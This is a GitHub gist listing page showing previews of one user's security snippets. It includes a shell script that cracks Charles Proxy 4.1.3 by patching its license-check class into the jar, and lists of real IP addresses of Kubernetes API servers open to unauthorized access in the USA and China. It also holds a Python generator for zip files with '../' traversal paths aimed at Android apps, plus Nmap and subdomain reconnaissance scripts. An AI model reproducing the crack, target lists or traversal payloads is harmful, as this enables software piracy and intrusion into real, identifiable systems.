Skip to content

Instantly share code, notes, and snippets.

@Oritz
Oritz / charles.4.1.3.crack.sh
Created June 30, 2017 01:59
Crack Charles Proxy 4.1.3
charles=/Applications/Charles.app/Contents/Java/charles.jar
dir=charleshack
mkdir $dir
cd $dir
cat >> psPJ.java <<EOF
package com.xk72.charles;
public final class psPJ {
public static boolean qIvM() { return true; }
public static String tCiz() { return "https://0x0d.im"; }
@Oritz
Oritz / k8s.us.txt
Created June 16, 2017 09:17
Kubernetes API Server unauthorized access list in USA. Data collected from Zoomeye.
http://40.74.244.42:8080
NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE
authapp postman-6ukzs 1/1 Running 0 9d 11.11.35.4 k8s-infraservice-1790420-3-1938179
authapp postman-qaroj 1/1 Running 0 9d 11.11.2.5 k8s-infraservice-1790420-4-1938185
authapp postman-spkd3 1/1 Running 0 9d 11.11.35.3 k8s-infraservice-1790420-3-1938179
authapp postman-wm6gj 1/1 Running 0 9d 11.11.62.2 k8s-infraservice-1790420-1-1938167
authapp postman-xq0yl 1/1 Running 0 9d 11.11.33.2 k8s-infraservice-1790420-2-1938173
authapp sphinx-qhyhh 1/1 Running 0 9d 11.11.62.4 k8s-infraservice-1790420-1-1938167
default busybox 1/1 Running 228 9d 11.11.35.5 k8s-infraservice-1790420-3-1938179
default my-nginx-13r91 1/
@Oritz
Oritz / k8s.cn.txt
Created June 16, 2017 09:14
Kubernetes API Server unauthorized access list in China. Data collected from Zoomeye.
http://40.125.203.167:8080
NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE
default rc-tomcat-bdfnq 1/1 Running 0 2h 172.17.0.2 boc-dev-server002
http://120.132.83.221:8001
NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE
default busybox 1/1 Running 0 27d 172.20.17.2 192.168.1.15
default nginx 1/1 Running 0 10d 172.20.74.2 192.168.1.14
default nginx-wyy 1/1 Running 0 4d 172.20.83.5 192.168.1.16
default nginx-wyy-2 1/1 Running 0 4d 172.20.74.3 192.168.1.14
@Oritz
Oritz / MScan.py
Last active December 11, 2019 02:03
Nmap 多线程扫描
#/usr/bin/env python
#-*-coding:utf8-*-
import Queue
import time
import sys
import logging
import threading
from libnmap.process import NmapProcess
@Oritz
Oritz / zip_traversal.py
Created January 17, 2017 06:09
生成测试安卓程序目录穿越漏洞的 zip 压缩文件
import zipfile
import sys
if __name__ == "__main__":
try:
with open("test.txt", "r") as f:
binary = f.read()
zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("test.zip")
zipFile.writestr("../../../../../data/data/com.corp.demo/files/test.txt", binary)
@Oritz
Oritz / get_subdomains_from_passivetotal.py
Last active June 9, 2017 03:28
用 PassiveTotal 的 API 获取子域名
import json
import sys
import requests
requests.packages.urllib3.disable_warnings()
domain = sys.argv[1]
url = 'https://api.passivetotal.org/v2/dns/search/keyword'
auth = ("your_email", "your_api_key")
@Oritz
Oritz / convert_domains_to_ips.py
Last active June 4, 2017 05:36
把 wydomain 的结果转换为 IP 列表
import sys
import json
import dns.resolver
resolver = dns.resolver.Resolver()
resolver.nameservers = ['8.8.8.8']
result = set()
domain_file = sys.argv[1]
with open(domain_file) as raw_domain: